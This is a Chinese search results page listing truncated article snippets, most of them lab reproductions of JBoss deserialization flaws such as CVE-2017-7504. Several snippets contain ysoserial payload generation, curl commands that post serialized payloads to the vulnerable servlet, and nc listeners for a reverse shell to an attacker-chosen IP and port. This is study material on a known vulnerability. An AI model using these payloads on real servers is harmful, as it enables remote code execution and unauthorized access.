首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全攻防

    JBoss 4.x JBossMQ JMS反序列化

    影响范围 JBoss AS <=4.x 漏洞概述 在JBoss AS 4.x及之前版本的JbossMQ实现过程中,JMS over HTTP Invocation Layer的HTTPServerILServlet.java ysoserial.jar CommonsCollections5 'touch /tmp/success.sh' > 2.ser #执行载荷 curl http://192.168.204.137:8080/jbossmq-httpil :/opt/jboss /home/jboss 压缩文件夹 zip -r jboss.zip jboss 随后解压后使用IDEA打开 紧接着我们来到server/default/deploy/jms/jbossmq-httpil.sar /jbossmq-httpil.war/WEB-INF/web.xml 随后跟进到类org.jboss.mq.il.http.servlet.HTTPServerILServlet,此时如果是POST传递的话 ,会触发processRequest方法 随后可以看到这里会进行一次反序列化操作,存在反序列化漏洞: /jbossmq-httpil/HTTPServerILServlet/* 参考链接 https:/

    38210编辑于 2025-01-22
  • 来自专栏HACK学习

    干货|最全的Jboss漏洞复现笔记

    JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser CVE-2017-7504 CVE-2017-7504为JBossMQ JMS 反序列化漏洞 漏洞原理 CVE-2017-7504漏洞与CVE-2015-7501的漏洞原理相似,只是利用的路径稍微出现了变化,CVE-2017-7504出现在/jbossmq-httpil/ JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利 ⽤该漏洞执⾏任意代码 漏洞复现 进入CVE-2017-7504的漏洞docker环境 访问http://192.168.1.10:8080/jbossmq-httpil/HTTPServerILServlet nc打开端口监听,再用之前生成的.ser文件,通过POST二进制数据上去,使用nc监听端口,即可拿到shell nc -lvp 4444curl http://192.168.112.148:8080/jbossmq-httpil

    8.5K30编辑于 2022-02-17
  • 来自专栏R0A1NG 技术分享

    JBOSS反序列化漏洞复现(CVE-2017-7504)

    原理 JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码 9963端口 nc -lvnp 9963 把ExampleCommonsCollections1WithHashMap.ser发送到靶机 curl http://http://x.x.x.x:9700/jbossmq-httpil

    2.5K10编辑于 2022-02-19
  • 来自专栏海说

    JBoss 主要模块

    JBossMQ 使Java 消息规范(JMS)的实现。 JBossSX 支持基于JAAS 的或不支持JAAS机制的安全实现。 JBossCX 实现了部分JCA 的功能。

    1.9K00发布于 2017-12-28
  • 来自专栏数说工作室

    常见web中间件漏洞总结 | Tomcat Nginx JBoss

    的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞 JBoss 5.x-6.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)危害:高危 JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java

    2.6K40编辑于 2023-01-04
  • 来自专栏黑白天安全团队

    Jboss漏洞利用总结

    Apache Group Commons Collections 漏洞利用 跟CVE-2015-7501利⽤⽅法⼀样,只是路径不⼀样,这个漏洞利⽤路径是 /invoker/EJBInvokerServlet JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X 漏洞描述 JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java 影响版本 JBoss AS 4.x及之前版本 漏洞利用 1、首先验证目标jboss是否存在此漏洞,直接访问 /jbossmq-httpil/HTTPServerILServlet 路径下。 :commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 反弹的IP:端口 curl http://目标IP:8080/jbossmq-httpil

    7K30发布于 2020-08-04
  • 来自专栏网络空间安全

    漏洞复现 -- JBoss漏洞总结

    12149的第二种方法,也可以使用一些自动化工具,比如 https://cdn.vulhub.org/deserialization/DeserializeExploit.jar JBoss 4.x JBossMQ 适用范围: lJboss AS 4.x及之前版本 漏洞环境: Vulhub - Docker-Compose file for vulnerability environment 漏洞验证: 访问/jbossmq-httpil 访问/jbossmq-httpil/HTTPServerILServlet显示页面,说明含有漏洞 ? 访问/invoker/EJBInvokerServlet,返回下载,说明有漏洞 ?

    3.2K40编辑于 2022-01-23
  • 来自专栏LuckySec网络安全

    Perun 内网渗透扫描神器

    2013-4810 jboss.jboss_adminconsole 检测是否存在JBoss路径/admin-console/,路径存在即可能存在漏洞CVE-2010-1871 jboss.jboss_jbossmq_httpil 检测是否存在JBoss路径/jbossmq-httpil/HTTPServerILServlet,路径存在即可能存在漏洞CVE-2017-7504 jboss.jboss_EJBInvokerServlet

    1.7K40编辑于 2022-11-02
  • 来自专栏HACK学习

    推荐一个内网渗透扫描神器

    2013-4810 jboss.jboss_adminconsole 检测是否存在JBoss路径/admin-console/,路径存在即可能存在漏洞CVE-2010-1871 jboss.jboss_jbossmq_httpil 检测是否存在JBoss路径/jbossmq-httpil/HTTPServerILServlet,路径存在即可能存在漏洞CVE-2017-7504 jboss.jboss_EJBInvokerServlet

    3.4K30发布于 2019-08-06
  • 来自专栏Java学习123

    IBM WebSphere MQ 系列(一)基础知识

    weblogic、Jboss     对象请求代理(ORB)-Java IIop、Java RMI,     消息中间件-WebSphere MQ 、Mirosoft MSMQ、BEA MessageQ、JBossMQ

    6K51发布于 2018-05-16
  • 来自专栏同步文章

    activemq学习之activemq功能(一)

    其他开源的 JMS 提供商 JbossMQ(jboss4)、jboss messaging(jboss5)、joram、ubermq、mantamq、openjms…大部分基于的JMS provider

    1.6K20编辑于 2022-10-25
  • 来自专栏大魏分享(微信公众号:david-share)

    大魏的思考:从纯技术角度看数字化转型

    它允许 EAP 模块启动群集范围的单例服务,这与 EAP 4 中旧版的 JBossMQ 类似。也就是说,它允许 EAP 充当主动-被动集群服务。

    91941发布于 2018-06-25
  • 来自专栏斑斓

    选择缓解风险的技术

    例如,倘若我们要将系统从IBMMQ迁移到JBossMQ,那么就只需要验证那些与消息队列通信的组件。若要将报表迁移到JasperReport,就应该只检测整个系统的报表组件。

    1K90发布于 2018-03-07
  • 来自专栏Bypass

    Web中间件常见安全漏洞总结

    .x 反序列化漏洞(CVE-2017-12149) JBoss JMXInvokerServlet 反序列化漏洞 JBoss EJBInvokerServlet 反序列化漏洞 JBoss <=4.x JBossMQ JBoss<=4.x JBossMQ JMS反序列化漏洞(CVE-2017-7504) 环境:jboss-4.2.3 设置外网访问:在 C:\jboss-4.2.3\server\default\deploy redirectPort="8443" acceptCount="100" connectionTimeout="20000" disableUploadTimeout="true" /> 访问/jbossmq-httpil /HTTPServerILServlet, 返回This is the JBossMQ HTTP-IL,说明页面存在,此页面存在反序列化漏洞。 这里直接利用CVE-2017-12149生成的ser,发送到/jbossmq-httpil/HTTPServerILServlet接口中。 如下: ? 修复建议:升级至最新版。

    17.9K44发布于 2020-02-26
  • 来自专栏养码场

    这13项技能让你从传统“撕”到互联网,论Java转型之不易(内含福利)

    原因主要有两个: 1、商业的Appserver都是收费的,然而,互联网提供的产品是免费的,互联网使用的产品也多是免费的 2、另外一个原因就是这些Appserver的实现性能差,有测评显示ActiveMQ比JbossMQ

    63030发布于 2018-08-13
  • 来自专栏一个安全研究员

    红队和蓝队都关心的东西在这儿了

    d 来源 http://www.cnblogs.com/Oran9e/p/7897102.html JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) a 漏洞分析 JbossMQ实现的HTTP调用层上的JMS中的HTTPServerILServlet.java,默认情况下在Red Hat Jboss Application Server <= Jboss 4.X中启用

    2.4K20发布于 2021-04-09
领券